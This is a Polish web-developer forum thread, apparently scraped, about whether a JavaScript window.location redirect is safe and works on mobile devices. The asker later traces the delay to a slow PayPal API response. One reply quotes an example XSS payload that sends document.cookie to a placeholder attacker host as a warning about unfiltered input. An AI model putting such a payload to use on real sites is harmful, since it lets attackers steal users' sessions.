Witam,
Czy bezpiecznie jest uzywac przekierowania na inna podstone kodu napisanego w JS: window.location
? Strona jest sporo uzywana przez tablety, smartphnes jak iPhone etc.
Witam,
Czy bezpiecznie jest uzywac przekierowania na inna podstone kodu napisanego w JS: window.location
? Strona jest sporo uzywana przez tablety, smartphnes jak iPhone etc.
O ile kontrolujesz (filtrujesz) przypisywany string to nie powinno być problemu.
@Maciej Cąderek Co masz na mysli filtruje? Na stronie mam 3 zdazenia, zaleznie od zdazenia przekierowuje na odpowiedni link. Wstrzykuje string z url z php do jquery i to wszsytko. Zastanawiam sie np czy jakies stare przegladarki moge nie obllogiwac window.location
? Szczegolnie te na smartfonach, bo chyba tam jest najwiekszy problem z przekierowaniem.
@poniatowski przykładowy atak xss:
window.location='http://attacker/?cookie='+document.cookie
@Desu Ok, dodalem funcje filtrujaca string przed atakami XSS. Tak, czy siak na tabletach i smartphonach takie przekierowanie powinno dzialac? Czy sa jakies zastrzezenia?
A nie możesz sprawdzić? Jak odpalisz server na swoim adresie IP(zamiast localhost) to mozesz ją otworzyć w sieci lokalnej na tablecie i telefonie.
@dzek69 - do kosza proszę!
Problem okazał się być w powolnej 'pracy' serwera PayPal. Dodatkowo wszystko co się wykonało po wysłaniu formularzu było poprzedzone ignore_user_abort
ustawione na true
. Sam request
i odpowiedz do PayPala przez API trwała od 2-4 sekund. Co jest mega długo i użytkownik nie miał żadnej wiadomości, że strona się jeszcze ładuje itd. Więc po pierwsze wywaliłem ignore_user_abort
. Następnie dodałem atrybut disable
do przycisku formularza oraz jakiś image
z loader'em i odpowiedni tekst do użytkownika. Do tego jeszcze ostatni warunek sprawdzający cały czas czy zamówienie zostało zapłacone, jeżeli okazało się, że tak to przekierowuję użytkownika do koszyka z odpowiednim komunikatem, żeby sprawdził pocztę.
Sam window.location
chyba nie robił nic złego. Działa jak ma działać. Problem było długie odpowiedź od serwera PayPal.